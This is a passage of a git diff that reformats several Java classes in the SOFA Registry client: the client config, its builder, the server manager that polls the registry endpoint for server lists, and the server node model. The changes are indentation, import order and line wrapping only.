getConnectTimeout() { - return connectTimeout; + if (instanceId != null ? !instanceId.equals(that.instanceId) : that.instanceId != null) { + return false; } - - /** - * Getter method for property socketTimeout. - * - * @return property value of socketTimeout - */ - @Override - public int getSocketTimeout() { - return socketTimeout; + if (zone != null ? !zone.equals(that.zone) : that.zone != null) { + return false; } - - /** - * Getter method for property invokeTimeout. - * - * @return property value of invokeTimeout - */ - @Override - public int getInvokeTimeout() { - return invokeTimeout; + if (registryEndpoint != null + ? !registryEndpoint.equals(that.registryEndpoint) + : that.registryEndpoint != null) { + return false; } - - /** - * Getter method for property recheckInterval. - * - * @return property value of recheckInterval - */ - @Override - public int getRecheckInterval() { - return recheckInterval; - } - - /** - * Getter method for property observerThreadCoreSize. - * - * @return property value of observerThreadCoreSize - */ - @Override - public int getObserverThreadCoreSize() { - return observerThreadCoreSize; - } - - /** - * Getter method for property observerThreadMaxSize. - * - * @return property value of observerThreadMaxSize - */ - @Override - public int getObserverThreadMaxSize() { - return observerThreadMaxSize; - } - - /** - * Getter method for property observerThreadQueueLength. - * - * @return property value of observerThreadQueueLength - */ - @Override - public int getObserverThreadQueueLength() { - return observerThreadQueueLength; - } - - /** - * Getter method for property observerCallbackTimeout. - * - * @return property value of observerCallbackTimeout - */ - @Override - public int getObserverCallbackTimeout() { - return observerCallbackTimeout; - } - - /** - * Getter method for property syncConfigRetryInterval. - * - * @return property value of syncConfigRetryInterval - */ - @Override - public int getSyncConfigRetryInterval() { - return syncConfigRetryInterval; - } - - /** - * Getter method for property accessKey. - * - * @return property value of accessKey - */ - @Override - public String getAccessKey() { - return accessKey; - } - - /** - * Getter method for property secretKey. - * - * @return property value of secretKey - */ - @Override - public String getSecretKey() { - return secretKey; - } - - /** - * Getter method for property algorithm. - * - * @return property value of algorithm - */ - @Override - public String getAlgorithm() { - return algorithm; - } - - /** - * Setter method for property algorithm. - * - * @param algorithm value to be assigned to property algorithm - */ - public void setAlgorithm(String algorithm) { - this.algorithm = algorithm; - } - - /** - * Getter method for property authCacheInterval. - * - * @return property value of authCacheInterval - */ - @Override - public long getAuthCacheInterval() { - return authCacheInterval; - } - - /** - * Setter method for property authCacheInterval. - * - * @param authCacheInterval value to be assigned to property authCacheInterval - */ - public void setAuthCacheInterval(long authCacheInterval) { - this.authCacheInterval = authCacheInterval; - } - - /** - * Getter method for property eventBusEnable. - * - * @return property value of eventBusEnable - */ - @Override - public boolean isEventBusEnable() { - return eventBusEnable; - } - - /** - * Setter method for property eventBusEnable. - * - * @param eventBusEnable value to be assigned to property eventBusEnable - */ - public void setEventBusEnable(boolean eventBusEnable) { - this.eventBusEnable = eventBusEnable; - } - - /** - * Equals boolean. - * - * @param o the o - * @return the boolean - */ - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (!(o instanceof DefaultRegistryClientConfig)) { - return false; - } - - DefaultRegistryClientConfig that = (DefaultRegistryClientConfig) o; - - if (registryEndpointPort != that.registryEndpointPort) { - return false; - } - if (env != null ? !env.equals(that.env) : that.env != null) { - return false; - } - if (instanceId != null ? !instanceId.equals(that.instanceId) : that.instanceId != null) { - return false; - } - if (zone != null ? !zone.equals(that.zone) : that.zone != null) { - return false; - } - if (registryEndpoint != null ? !registryEndpoint.equals(that.registryEndpoint) - : that.registryEndpoint != null) { - return false; - } - if (dataCenter != null ? !dataCenter.equals(that.dataCenter) : that.dataCenter != null) { - return false; - } - return appName != null ? appName.equals(that.appName) : that.appName == null; - } - - /** - * Hash code int. - * - * @return the int - */ - @Override - public int hashCode() { - int result = env != null ? env.hashCode() : 0; - result = 31 * result + (instanceId != null ? instanceId.hashCode() : 0); - result = 31 * result + (zone != null ? zone.hashCode() : 0); - result = 31 * result + (registryEndpoint != null ? registryEndpoint.hashCode() : 0); - result = 31 * result + registryEndpointPort; - result = 31 * result + (dataCenter != null ? dataCenter.hashCode() : 0); - result = 31 * result + (appName != null ? appName.hashCode() : 0); - return result; - } - - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "DefaultRegistryClientConfig{" + "env='" + env + '\'' + ", instanceId='" - + instanceId + '\'' + ", zone='" + zone + '\'' + ", registryEndpoint='" - + registryEndpoint + '\'' + ", registryEndpointPort=" + registryEndpointPort - + ", dataCenter='" + dataCenter + '\'' + ", appName='" + appName + '\'' - + ", connectTimeout=" + connectTimeout + ", socketTimeout=" + socketTimeout - + ", invokeTimeout=" + invokeTimeout + ", recheckInterval=" + recheckInterval - + ", observerThreadCoreSize=" + observerThreadCoreSize + ", observerThreadMaxSize=" - + observerThreadMaxSize + ", observerThreadQueueLength=" + observerThreadQueueLength - + ", observerCallbackTimeout=" + observerCallbackTimeout - + ", syncConfigRetryInterval=" + syncConfigRetryInterval + ", accessKey='" - + accessKey + '\'' + ", secretKey='" + secretKey + '\'' + ", algorithm='" - + algorithm + '\'' + ", authCacheInterval=" + authCacheInterval - + ", eventBusEnable=" + eventBusEnable + '}'; + if (dataCenter != null ? !dataCenter.equals(that.dataCenter) : that.dataCenter != null) { + return false; } + return appName != null ? appName.equals(that.appName) : that.appName == null; + } + + /** + * Hash code int. + * + * @return the int + */ + @Override + public int hashCode() { + int result = env != null ? env.hashCode() : 0; + result = 31 * result + (instanceId != null ? instanceId.hashCode() : 0); + result = 31 * result + (zone != null ? zone.hashCode() : 0); + result = 31 * result + (registryEndpoint != null ? registryEndpoint.hashCode() : 0); + result = 31 * result + registryEndpointPort; + result = 31 * result + (dataCenter != null ? dataCenter.hashCode() : 0); + result = 31 * result + (appName != null ? appName.hashCode() : 0); + return result; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return "DefaultRegistryClientConfig{" + + "env='" + + env + + '\'' + + ", instanceId='" + + instanceId + + '\'' + + ", zone='" + + zone + + '\'' + + ", registryEndpoint='" + + registryEndpoint + + '\'' + + ", registryEndpointPort=" + + registryEndpointPort + + ", dataCenter='" + + dataCenter + + '\'' + + ", appName='" + + appName + + '\'' + + ", connectTimeout=" + + connectTimeout + + ", socketTimeout=" + + socketTimeout + + ", invokeTimeout=" + + invokeTimeout + + ", recheckInterval=" + + recheckInterval + + ", observerThreadCoreSize=" + + observerThreadCoreSize + + ", observerThreadMaxSize=" + + observerThreadMaxSize + + ", observerThreadQueueLength=" + + observerThreadQueueLength + + ", observerCallbackTimeout=" + + observerCallbackTimeout + + ", syncConfigRetryInterval=" + + syncConfigRetryInterval + + ", accessKey='" + + accessKey + + '\'' + + ", secretKey='" + + secretKey + + '\'' + + ", algorithm='" + + algorithm + + '\'' + + ", authCacheInterval=" + + authCacheInterval + + ", eventBusEnable=" + + eventBusEnable + + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigBuilder.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigBuilder.java index 542cda238..88278f759 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigBuilder.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultRegistryClientConfigBuilder.java @@ -26,268 +26,288 @@ * @version $Id : DefaultRegistryClientConfig.java, v 0.1 2017-11-23 20:12 zhuoyu.sjw Exp $$ */ public class DefaultRegistryClientConfigBuilder { - private String env; - private String instanceId; - private String zone = DEFAULT_ZONE; - private String registryEndpoint; - private int registryEndpointPort = 9603; - private String dataCenter = DEFAULT_DATA_CENTER; - private String appName; - private int connectTimeout = 3000; - private int socketTimeout = 3000; - private int invokeTimeout = 1000; - private int recheckInterval = 500; - private int observerThreadCoreSize = 5; - private int observerThreadMaxSize = 10; - private int observerThreadQueueLength = 1000; - private int observerCallbackTimeout = 5000; - private int syncConfigRetryInterval = 30000; - private String accessKey; - private String secretKey; - private String algorithm = "HmacSHA256"; - private long authCacheInterval = 5 * 60 * 1000; - private boolean eventBusEnable = true; + private String env; + private String instanceId; + private String zone = DEFAULT_ZONE; + private String registryEndpoint; + private int registryEndpointPort = 9603; + private String dataCenter = DEFAULT_DATA_CENTER; + private String appName; + private int connectTimeout = 3000; + private int socketTimeout = 3000; + private int invokeTimeout = 1000; + private int recheckInterval = 500; + private int observerThreadCoreSize = 5; + private int observerThreadMaxSize = 10; + private int observerThreadQueueLength = 1000; + private int observerCallbackTimeout = 5000; + private int syncConfigRetryInterval = 30000; + private String accessKey; + private String secretKey; + private String algorithm = "HmacSHA256"; + private long authCacheInterval = 5 * 60 * 1000; + private boolean eventBusEnable = true; - /** - * Start default registry client config builder. - * - * @return the default registry client config builder - */ - public static DefaultRegistryClientConfigBuilder start() { - return new DefaultRegistryClientConfigBuilder(); - } + /** + * Start default registry client config builder. + * + * @return the default registry client config builder + */ + public static DefaultRegistryClientConfigBuilder start() { + return new DefaultRegistryClientConfigBuilder(); + } - /** - * Sets env. - * - * @param env the env - * @return the env - */ - public DefaultRegistryClientConfigBuilder setEnv(String env) { - this.env = env; - return this; - } + /** + * Sets env. + * + * @param env the env + * @return the env + */ + public DefaultRegistryClientConfigBuilder setEnv(String env) { + this.env = env; + return this; + } - /** - * Sets instance id. - * - * @param instanceId the instance id - * @return the instance id - */ - public DefaultRegistryClientConfigBuilder setInstanceId(String instanceId) { - this.instanceId = instanceId; - return this; - } + /** + * Sets instance id. + * + * @param instanceId the instance id + * @return the instance id + */ + public DefaultRegistryClientConfigBuilder setInstanceId(String instanceId) { + this.instanceId = instanceId; + return this; + } - /** - * Sets zone. - * - * @param zone the zone - * @return the zone - */ - public DefaultRegistryClientConfigBuilder setZone(String zone) { - this.zone = zone; - return this; - } + /** + * Sets zone. + * + * @param zone the zone + * @return the zone + */ + public DefaultRegistryClientConfigBuilder setZone(String zone) { + this.zone = zone; + return this; + } - /** - * Sets registry endpoint. - * - * @param registryEndpoint the registry endpoint - * @return the registry endpoint - */ - public DefaultRegistryClientConfigBuilder setRegistryEndpoint(String registryEndpoint) { - this.registryEndpoint = registryEndpoint; - return this; - } + /** + * Sets registry endpoint. + * + * @param registryEndpoint the registry endpoint + * @return the registry endpoint + */ + public DefaultRegistryClientConfigBuilder setRegistryEndpoint(String registryEndpoint) { + this.registryEndpoint = registryEndpoint; + return this; + } - /** - * Sets registry endpoint port. - * - * @param registryEndpointPort the registry endpoint port - * @return the registry endpoint port - */ - public DefaultRegistryClientConfigBuilder setRegistryEndpointPort(int registryEndpointPort) { - this.registryEndpointPort = registryEndpointPort; - return this; - } + /** + * Sets registry endpoint port. + * + * @param registryEndpointPort the registry endpoint port + * @return the registry endpoint port + */ + public DefaultRegistryClientConfigBuilder setRegistryEndpointPort(int registryEndpointPort) { + this.registryEndpointPort = registryEndpointPort; + return this; + } - /** - * Sets data center. - * - * @param dataCenter the data center - * @return the data center - */ - public DefaultRegistryClientConfigBuilder setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - return this; - } + /** + * Sets data center. + * + * @param dataCenter the data center + * @return the data center + */ + public DefaultRegistryClientConfigBuilder setDataCenter(String dataCenter) { + this.dataCenter = dataCenter; + return this; + } - /** - * Sets app name. - * - * @param appName the app name - * @return the app name - */ - public DefaultRegistryClientConfigBuilder setAppName(String appName) { - this.appName = appName; - return this; - } + /** + * Sets app name. + * + * @param appName the app name + * @return the app name + */ + public DefaultRegistryClientConfigBuilder setAppName(String appName) { + this.appName = appName; + return this; + } - /** - * Setter method for property observerThreadCoreSize. - * - * @param observerThreadCoreSize value to be assigned to property observerThreadCoreSize - */ - public DefaultRegistryClientConfigBuilder setObserverThreadCoreSize(int observerThreadCoreSize) { - this.observerThreadCoreSize = observerThreadCoreSize; - return this; - } + /** + * Setter method for property observerThreadCoreSize. + * + * @param observerThreadCoreSize value to be assigned to property observerThreadCoreSize + */ + public DefaultRegistryClientConfigBuilder setObserverThreadCoreSize(int observerThreadCoreSize) { + this.observerThreadCoreSize = observerThreadCoreSize; + return this; + } - /** - * Setter method for property observerThreadMaxSize. - * - * @param observerThreadMaxSize value to be assigned to property observerThreadMaxSize - */ - public DefaultRegistryClientConfigBuilder setObserverThreadMaxSize(int observerThreadMaxSize) { - this.observerThreadMaxSize = observerThreadMaxSize; - return this; - } + /** + * Setter method for property observerThreadMaxSize. + * + * @param observerThreadMaxSize value to be assigned to property observerThreadMaxSize + */ + public DefaultRegistryClientConfigBuilder setObserverThreadMaxSize(int observerThreadMaxSize) { + this.observerThreadMaxSize = observerThreadMaxSize; + return this; + } - /** - * Setter method for property observerThreadQueueLength. - * - * @param observerThreadQueueLength value to be assigned to property observerThreadQueueLength - */ - public DefaultRegistryClientConfigBuilder setObserverThreadQueueLength(int observerThreadQueueLength) { - this.observerThreadQueueLength = observerThreadQueueLength; - return this; - } + /** + * Setter method for property observerThreadQueueLength. + * + * @param observerThreadQueueLength value to be assigned to property observerThreadQueueLength + */ + public DefaultRegistryClientConfigBuilder setObserverThreadQueueLength( + int observerThreadQueueLength) { + this.observerThreadQueueLength = observerThreadQueueLength; + return this; + } - /** - * Setter method for property observerCallbackTimeout. - * - * @param observerCallbackTimeout value to be assigned to property observerCallbackTimeout - */ - public DefaultRegistryClientConfigBuilder setObserverCallbackTimeout(int observerCallbackTimeout) { - this.observerCallbackTimeout = observerCallbackTimeout; - return this; - } + /** + * Setter method for property observerCallbackTimeout. + * + * @param observerCallbackTimeout value to be assigned to property observerCallbackTimeout + */ + public DefaultRegistryClientConfigBuilder setObserverCallbackTimeout( + int observerCallbackTimeout) { + this.observerCallbackTimeout = observerCallbackTimeout; + return this; + } - /** - * Sets connect timeout. - * - * @param connectTimeout the connect timeout - * @return the connect timeout - */ - public DefaultRegistryClientConfigBuilder setConnectTimeout(int connectTimeout) { - this.connectTimeout = connectTimeout; - return this; - } + /** + * Sets connect timeout. + * + * @param connectTimeout the connect timeout + * @return the connect timeout + */ + public DefaultRegistryClientConfigBuilder setConnectTimeout(int connectTimeout) { + this.connectTimeout = connectTimeout; + return this; + } - /** - * Sets socket timeout. - * - * @param socketTimeout the socket timeout - * @return the socket timeout - */ - public DefaultRegistryClientConfigBuilder setSocketTimeout(int socketTimeout) { - this.socketTimeout = socketTimeout; - return this; - } + /** + * Sets socket timeout. + * + * @param socketTimeout the socket timeout + * @return the socket timeout + */ + public DefaultRegistryClientConfigBuilder setSocketTimeout(int socketTimeout) { + this.socketTimeout = socketTimeout; + return this; + } - /** - * Sets invoke timeout. - * - * @param invokeTimeout the invoke timeout - * @return the invoke timeout - */ - public DefaultRegistryClientConfigBuilder setInvokeTimeout(int invokeTimeout) { - this.invokeTimeout = invokeTimeout; - return this; - } + /** + * Sets invoke timeout. + * + * @param invokeTimeout the invoke timeout + * @return the invoke timeout + */ + public DefaultRegistryClientConfigBuilder setInvokeTimeout(int invokeTimeout) { + this.invokeTimeout = invokeTimeout; + return this; + } - /** - * Sets recheck interval. - * - * @param recheckInterval the recheck interval - * @return the recheck interval - */ - public DefaultRegistryClientConfigBuilder setRecheckInterval(int recheckInterval) { - this.recheckInterval = recheckInterval; - return this; - } + /** + * Sets recheck interval. + * + * @param recheckInterval the recheck interval + * @return the recheck interval + */ + public DefaultRegistryClientConfigBuilder setRecheckInterval(int recheckInterval) { + this.recheckInterval = recheckInterval; + return this; + } - /** - * Setter method for property syncConfigRetryInterval. - * - * @param syncConfigRetryInterval value to be assigned to property syncConfigRetryInterval - */ - public DefaultRegistryClientConfigBuilder setSyncConfigRetryInterval(int syncConfigRetryInterval) { - this.syncConfigRetryInterval = syncConfigRetryInterval; - return this; - } + /** + * Setter method for property syncConfigRetryInterval. + * + * @param syncConfigRetryInterval value to be assigned to property syncConfigRetryInterval + */ + public DefaultRegistryClientConfigBuilder setSyncConfigRetryInterval( + int syncConfigRetryInterval) { + this.syncConfigRetryInterval = syncConfigRetryInterval; + return this; + } - /** - * Setter method for property accessKey. - * - * @param accessKey value to be assigned to property accessKey - */ - public DefaultRegistryClientConfigBuilder setAccessKey(String accessKey) { - this.accessKey = accessKey; - return this; - } + /** + * Setter method for property accessKey. + * + * @param accessKey value to be assigned to property accessKey + */ + public DefaultRegistryClientConfigBuilder setAccessKey(String accessKey) { + this.accessKey = accessKey; + return this; + } - /** - * Setter method for property secretKey. - * - * @param secretKey value to be assigned to property secretKey - */ - public DefaultRegistryClientConfigBuilder setSecretKey(String secretKey) { - this.secretKey = secretKey; - return this; - } + /** + * Setter method for property secretKey. + * + * @param secretKey value to be assigned to property secretKey + */ + public DefaultRegistryClientConfigBuilder setSecretKey(String secretKey) { + this.secretKey = secretKey; + return this; + } - /** - * Setter method for property algorithm. - * - * @param algorithm value to be assigned to property algorithm - */ - public DefaultRegistryClientConfigBuilder setAlgorithm(String algorithm) { - this.algorithm = algorithm; - return this; - } + /** + * Setter method for property algorithm. + * + * @param algorithm value to be assigned to property algorithm + */ + public DefaultRegistryClientConfigBuilder setAlgorithm(String algorithm) { + this.algorithm = algorithm; + return this; + } - /** - * Setter method for property authCacheInterval. - * - * @param authCacheInterval value to be assigned to property authCacheInterval - */ - public DefaultRegistryClientConfigBuilder setAuthCacheInterval(long authCacheInterval) { - this.authCacheInterval = authCacheInterval; - return this; - } + /** + * Setter method for property authCacheInterval. + * + * @param authCacheInterval value to be assigned to property authCacheInterval + */ + public DefaultRegistryClientConfigBuilder setAuthCacheInterval(long authCacheInterval) { + this.authCacheInterval = authCacheInterval; + return this; + } - /** - * Setter method for property eventBusEnable. - * - * @param eventBusEnable value to be assigned to property eventBusEnable - */ - public DefaultRegistryClientConfigBuilder setEventBusEnable(boolean eventBusEnable) { - this.eventBusEnable = eventBusEnable; - return this; - } + /** + * Setter method for property eventBusEnable. + * + * @param eventBusEnable value to be assigned to property eventBusEnable + */ + public DefaultRegistryClientConfigBuilder setEventBusEnable(boolean eventBusEnable) { + this.eventBusEnable = eventBusEnable; + return this; + } - /** - * Create default registry client config default registry client config. - * - * @return the default registry client config - */ - public DefaultRegistryClientConfig build() { - return new DefaultRegistryClientConfig(env, instanceId, zone, registryEndpoint, - registryEndpointPort, dataCenter, appName, connectTimeout, socketTimeout, - invokeTimeout, recheckInterval, observerThreadCoreSize, observerThreadMaxSize, - observerThreadQueueLength, observerCallbackTimeout, syncConfigRetryInterval, accessKey, - secretKey, algorithm, authCacheInterval, eventBusEnable); - } -} \ No newline at end of file + /** + * Create default registry client config default registry client config. + * + * @return the default registry client config + */ + public DefaultRegistryClientConfig build() { + return new DefaultRegistryClientConfig( + env, + instanceId, + zone, + registryEndpoint, + registryEndpointPort, + dataCenter, + appName, + connectTimeout, + socketTimeout, + invokeTimeout, + recheckInterval, + observerThreadCoreSize, + observerThreadMaxSize, + observerThreadQueueLength, + observerCallbackTimeout, + syncConfigRetryInterval, + accessKey, + secretKey, + algorithm, + authCacheInterval, + eventBusEnable); + } +} diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerManager.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerManager.java index 281cd1d7d..050e46c3a 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerManager.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerManager.java @@ -22,8 +22,6 @@ import com.alipay.sofa.registry.client.remoting.ServerNode; import com.alipay.sofa.registry.client.util.HttpClientUtils; import com.alipay.sofa.registry.client.util.ServerNodeParser; -import org.slf4j.Logger; - import java.util.ArrayList; import java.util.HashMap; import java.util.HashSet; @@ -32,135 +30,128 @@ import java.util.Random; import java.util.Set; import java.util.concurrent.atomic.AtomicBoolean; +import org.slf4j.Logger; /** * The type Default server manager. + * * @author zhuoyu.sjw * @version $Id : DefaultServerManager.java, v 0.1 2017-12-25 11:48 zhuoyu.sjw Exp $$ */ public class DefaultServerManager implements ServerManager { - /** - * The constant MIN_RETRY_INTERVAL. - */ - public static final int MIN_RETRY_INTERVAL = 10000; - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultServerManager.class); - private RegistryClientConfig config; - private Set serverNodes; - private SyncServerListThread syncServerListTask; + /** The constant MIN_RETRY_INTERVAL. */ + public static final int MIN_RETRY_INTERVAL = 10000; + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultServerManager.class); - private AtomicBoolean inited = new AtomicBoolean(false); + private RegistryClientConfig config; + private Set serverNodes; + private SyncServerListThread syncServerListTask; - /** - * Instantiates a new Default server manager. - * - * @param config the config - */ - public DefaultServerManager(RegistryClientConfig config) { - this.config = config; - this.serverNodes = new HashSet(); - this.syncServerListTask = new SyncServerListThread(config); - } + private AtomicBoolean inited = new AtomicBoolean(false); - /** - * @see ServerManager#getServerList() - */ - @Override - public List getServerList() { - // init once - if (inited.compareAndSet(false, true)) { - this.syncServerListTask.start(); - } - // sync query when server list is empty - if (serverNodes.isEmpty()) { - syncServerList(); - } - return new ArrayList(serverNodes); + /** + * Instantiates a new Default server manager. + * + * @param config the config + */ + public DefaultServerManager(RegistryClientConfig config) { + this.config = config; + this.serverNodes = new HashSet(); + this.syncServerListTask = new SyncServerListThread(config); + } + + /** @see ServerManager#getServerList() */ + @Override + public List getServerList() { + // init once + if (inited.compareAndSet(false, true)) { + this.syncServerListTask.start(); } + // sync query when server list is empty + if (serverNodes.isEmpty()) { + syncServerList(); + } + return new ArrayList(serverNodes); + } - /** - * @see ServerManager#random() - */ - @Override - public ServerNode random() { - List urls = getServerList(); - if (null == urls || urls.size() == 0) { - return null; - } - Random random = new Random(); - return urls.get(random.nextInt(urls.size())); + /** @see ServerManager#random() */ + @Override + public ServerNode random() { + List urls = getServerList(); + if (null == urls || urls.size() == 0) { + return null; } + Random random = new Random(); + return urls.get(random.nextInt(urls.size())); + } - private void syncServerList() { - String url = String.format("http://%s:%d/api/servers/query", config.getRegistryEndpoint(), - config.getRegistryEndpointPort()); - Map params = new HashMap(); - params.put("env", config.getEnv()); - params.put("zone", config.getZone()); - params.put("dataCenter", config.getDataCenter()); - params.put("appName", config.getAppName()); - params.put("instanceId", config.getInstanceId()); - try { - String result = HttpClientUtils.get(url, params, config); - if (null != result) { - String[] servers = result.split(";"); - Set tempNodes = new HashSet(); - for (String server : servers) { - try { - ServerNode serverNode = ServerNodeParser.parse(server); - tempNodes.add(serverNode); - } catch (Exception e) { - LOGGER.error("[serverManager] parse server node error, {}", server, e); - } - } - if (!tempNodes.equals(serverNodes)) { - serverNodes = tempNodes; - LOGGER.info("[serverManager] update nodes success, {}", tempNodes); - } - } - } catch (Exception e) { - LOGGER.error("[serverManager] get server list error", e); + private void syncServerList() { + String url = + String.format( + "http://%s:%d/api/servers/query", + config.getRegistryEndpoint(), config.getRegistryEndpointPort()); + Map params = new HashMap(); + params.put("env", config.getEnv()); + params.put("zone", config.getZone()); + params.put("dataCenter", config.getDataCenter()); + params.put("appName", config.getAppName()); + params.put("instanceId", config.getInstanceId()); + try { + String result = HttpClientUtils.get(url, params, config); + if (null != result) { + String[] servers = result.split(";"); + Set tempNodes = new HashSet(); + for (String server : servers) { + try { + ServerNode serverNode = ServerNodeParser.parse(server); + tempNodes.add(serverNode); + } catch (Exception e) { + LOGGER.error("[serverManager] parse server node error, {}", server, e); + } + } + if (!tempNodes.equals(serverNodes)) { + serverNodes = tempNodes; + LOGGER.info("[serverManager] update nodes success, {}", tempNodes); } + } + } catch (Exception e) { + LOGGER.error("[serverManager] get server list error", e); } + } - /** - * The type Sync server list task. - */ - class SyncServerListThread extends Thread { + /** The type Sync server list task. */ + class SyncServerListThread extends Thread { - private RegistryClientConfig config; + private RegistryClientConfig config; - /** - * Instantiates a new Sync server list task. - * - * @param config the config - */ - public SyncServerListThread(RegistryClientConfig config) { - this.setName("SyncServerListThread"); - this.setDaemon(true); - this.config = config; - } + /** + * Instantiates a new Sync server list task. + * + * @param config the config + */ + public SyncServerListThread(RegistryClientConfig config) { + this.setName("SyncServerListThread"); + this.setDaemon(true); + this.config = config; + } - /** - * @see Thread#run() - */ - @SuppressWarnings("InfiniteLoopStatement") - @Override - public void run() { - int retryInterval; - while (true) { - try { - retryInterval = Math.max(MIN_RETRY_INTERVAL, - config.getSyncConfigRetryInterval()); - Thread.sleep(retryInterval); + /** @see Thread#run() */ + @SuppressWarnings("InfiniteLoopStatement") + @Override + public void run() { + int retryInterval; + while (true) { + try { + retryInterval = Math.max(MIN_RETRY_INTERVAL, config.getSyncConfigRetryInterval()); + Thread.sleep(retryInterval); - syncServerList(); - } catch (Throwable e) { - LOGGER.error("[serverManager] sync server list task error", e); - } - } + syncServerList(); + } catch (Throwable e) { + LOGGER.error("[serverManager] sync server list task error", e); } + } } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerNode.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerNode.java index 3e5a067c5..886631ff0 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerNode.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultServerNode.java @@ -17,159 +17,163 @@ package com.alipay.sofa.registry.client.provider; import com.alipay.sofa.registry.client.remoting.ServerNode; - import java.util.Properties; /** * The type Default server node. + * * @author zhuoyu.sjw * @version $Id : DefaultServerNode.java, v 0.1 2018-03-01 17:13 zhuoyu.sjw Exp $$ */ public class DefaultServerNode implements ServerNode { - private String url; - - private String host; - - private int port; - - private Properties properties; - - /** - * Instantiates a new Default server node. - * - * @param url the url - * @param host the host - * @param port the port - * @param properties the properties - */ - public DefaultServerNode(String url, String host, int port, Properties properties) { - this.url = url; - this.host = host; - this.port = port; - this.properties = properties; - } - - /** - * Gets host. - * - * @return the host - */ - @Override - public String getHost() { - return host; - } - - /** - * Gets port. - * - * @return the port - */ - @Override - public int getPort() { - return port; - } - - /** - * Gets url. - * - * @return the url - */ - @Override - public String getUrl() { - return url; - } - - /** - * Gets properties. - * - * @return the properties - */ - @Override - public Properties getProperties() { - return properties; + private String url; + + private String host; + + private int port; + + private Properties properties; + + /** + * Instantiates a new Default server node. + * + * @param url the url + * @param host the host + * @param port the port + * @param properties the properties + */ + public DefaultServerNode(String url, String host, int port, Properties properties) { + this.url = url; + this.host = host; + this.port = port; + this.properties = properties; + } + + /** + * Gets host. + * + * @return the host + */ + @Override + public String getHost() { + return host; + } + + /** + * Gets port. + * + * @return the port + */ + @Override + public int getPort() { + return port; + } + + /** + * Gets url. + * + * @return the url + */ + @Override + public String getUrl() { + return url; + } + + /** + * Gets properties. + * + * @return the properties + */ + @Override + public Properties getProperties() { + return properties; + } + + /** + * Setter method for property url. + * + * @param url value to be assigned to property url + */ + public void setUrl(String url) { + this.url = url; + } + + /** + * Setter method for property host. + * + * @param host value to be assigned to property host + */ + public void setHost(String host) { + this.host = host; + } + + /** + * Setter method for property port. + * + * @param port value to be assigned to property port + */ + public void setPort(int port) { + this.port = port; + } + + /** + * Setter method for property properties. + * + * @param properties value to be assigned to property properties + */ + public void setProperties(Properties properties) { + this.properties = properties; + } + + /** @see Object#equals(Object) */ + @Override + public boolean equals(Object o) { + if (this == o) { + return true; } - - /** - * Setter method for property url. - * - * @param url value to be assigned to property url - */ - public void setUrl(String url) { - this.url = url; + if (!(o instanceof DefaultServerNode)) { + return false; } - /** - * Setter method for property host. - * - * @param host value to be assigned to property host - */ - public void setHost(String host) { - this.host = host; - } + DefaultServerNode that = (DefaultServerNode) o; - /** - * Setter method for property port. - * - * @param port value to be assigned to property port - */ - public void setPort(int port) { - this.port = port; + if (port != that.port) { + return false; } - - /** - * Setter method for property properties. - * - * @param properties value to be assigned to property properties - */ - public void setProperties(Properties properties) { - this.properties = properties; + if (url != null ? !url.equals(that.url) : that.url != null) { + return false; } - - /** - * @see Object#equals(Object) - */ - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (!(o instanceof DefaultServerNode)) { - return false; - } - - DefaultServerNode that = (DefaultServerNode) o; - - if (port != that.port) { - return false; - } - if (url != null ? !url.equals(that.url) : that.url != null) { - return false; - } - if (host != null ? !host.equals(that.host) : that.host != null) { - return false; - } - return properties != null ? properties.equals(that.properties) : that.properties == null; - } - - /** - * @see Object#hashCode() - */ - @Override - public int hashCode() { - int result = url != null ? url.hashCode() : 0; - result = 31 * result + (host != null ? host.hashCode() : 0); - result = 31 * result + port; - result = 31 * result + (properties != null ? properties.hashCode() : 0); - return result; - } - - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "DefaultServerNode{" + "url='" + url + '\'' + ", host='" + host + '\'' + ", port=" - + port + ", properties=" + properties + '}'; + if (host != null ? !host.equals(that.host) : that.host != null) { + return false; } + return properties != null ? properties.equals(that.properties) : that.properties == null; + } + + /** @see Object#hashCode() */ + @Override + public int hashCode() { + int result = url != null ? url.hashCode() : 0; + result = 31 * result + (host != null ? host.hashCode() : 0); + result = 31 * result + port; + result = 31 * result + (properties != null ? properties.hashCode() : 0); + return result; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "DefaultServerNode{" + + "url='" + + url + + '\'' + + ", host='" + + host + + '\'' + + ", port=" + + port + + ", properties=" + + properties + + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultSubscriber.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultSubscriber.java index f3edf8f4a..2e451f2f8 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultSubscriber.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/DefaultSubscriber.java @@ -31,7 +31,6 @@ import com.alipay.sofa.registry.core.model.DataBox; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.core.model.SubscriberRegister; - import java.util.ArrayList; import java.util.HashMap; import java.util.List; @@ -50,266 +49,262 @@ */ public class DefaultSubscriber extends AbstractInternalRegister implements Subscriber { - private final String REGIST_ID; - private 